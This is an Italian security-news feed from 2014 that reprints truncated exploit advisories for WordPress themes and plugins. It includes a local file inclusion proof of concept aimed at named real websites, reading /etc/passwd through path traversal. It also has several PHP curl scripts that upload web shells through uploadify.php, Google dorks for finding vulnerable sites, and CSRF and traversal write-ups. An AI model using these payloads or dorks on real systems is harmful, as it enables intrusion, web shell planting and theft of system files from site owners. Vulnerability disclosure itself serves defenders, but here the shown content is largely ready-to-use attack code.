WordPress LineNity Local File Inclusion

23 aprile 2014 - Fonte: http://www.mondounix.com
[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] 
[+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
         http://SITE/wp-content/themes/linenity/functions/download.php?imgurl=download.php

...

Leggi il seguito »

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 aprile 2014 - Fonte: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are much more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...

Leggi il seguito »

WordPress Business Intelligence 1.0.6 Shell Upload

31 marzo 2014 - Fonte: http://www.mondounix.com
##############################################################################################
# Exploit Title   : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################
 
 
////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php...

Leggi il seguito »

WordPress HTML Sitemap 1.2 Cross Site Request Forgery

31 marzo 2014 - Fonte: http://www.mondounix.com
Details
================
Software: WP HTML Sitemap
Version: 1.2
Homepage: http://wordpress.org/plugins/wp-html-sitemap/
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
 
Description
================
CSRF vulnerability in WP HTML Sitemap 1.2
 
Vulnerability
================
A CSRF vulnerability exists which allows an attacker to delete the 
sitemap if a logged-in admin user visits a link of the attacker’s choosing.
Line 202 of inc/AdminPage.php says “// check whether form was just 
submitted” but the following if/elseif statements only check whether a 
particular button was pressed without checking nonce values. The form in 
question is printed in wp_html_sitemap_AdminPage::createSitemapForm() 
around line 146...

Leggi il seguito »

WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress Felici / Custom Background Shell Upload

25 marzo 2014 - Fonte: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Prooft:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...

Leggi il seguito »

WordPress LayerSlider 4.6.1 CSRF / Traversal

12 marzo 2014 - Fonte: http://www.mondounix.com
==========================================================
Wordpress plugin LayerSlider WP Version 4.6.1 (Possible all versions) 
suffers from CSRF And from Directory Traversal Vulnerabilities.
 
AFAIK multiple wordpress themes uses this plugin.
And one of them is  satellite - v1.0.2 wordpress theme.
==========================================================
 
Tested on:
Server version: Apache/2.4.7 (Fedora)
Server built:   Mar  3 2014 12:12:09
 
$ php -v
PHP 5.5.10 (cli) (built: Mar  5 2014 17:13:58) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
 
Wordpress 3.8.1 (Fresh install)
 
Theme Default package: satellite - v1.0.2 + LayerSlider WP Version 4.6.1...

Leggi il seguito »

WordPress Barclaycart Shell Upload

10 marzo 2014 - Fonte: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...

Leggi il seguito »

WordPress Premium Gallery Manager Shell Upload

8 marzo 2014 - Fonte: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...

Leggi il seguito »

WordPress thecotton Themes Remote File Upload Vulnerability

3 marzo 2014 - Fonte: http://www.mondounix.com
#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@ 
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@ 
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@ 
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@...

Leggi il seguito »